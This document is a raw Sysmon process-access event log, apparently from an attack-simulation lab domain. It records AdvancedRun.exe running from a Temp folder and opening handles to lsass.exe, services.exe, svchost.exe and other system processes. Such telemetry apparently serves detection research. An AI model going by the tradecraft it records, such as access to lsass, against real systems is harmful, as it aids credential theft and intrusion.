10341000x80000000000000004078606Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.903{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078605Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.902{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078604Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.901{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE
10341000x80000000000000004078603Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.899{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE
10341000x80000000000000004078602Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.895{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078601Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.895{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE
10341000x80000000000000004078600Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.895{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE
10341000x80000000000000004078599Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE
10341000x80000000000000004078598Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE
10341000x80000000000000004078597Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1
10341000x80000000000000004078596Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078595Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE
10341000x80000000000000004078594Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078593Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE
10341000x80000000000000004078592Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078591Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078590Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
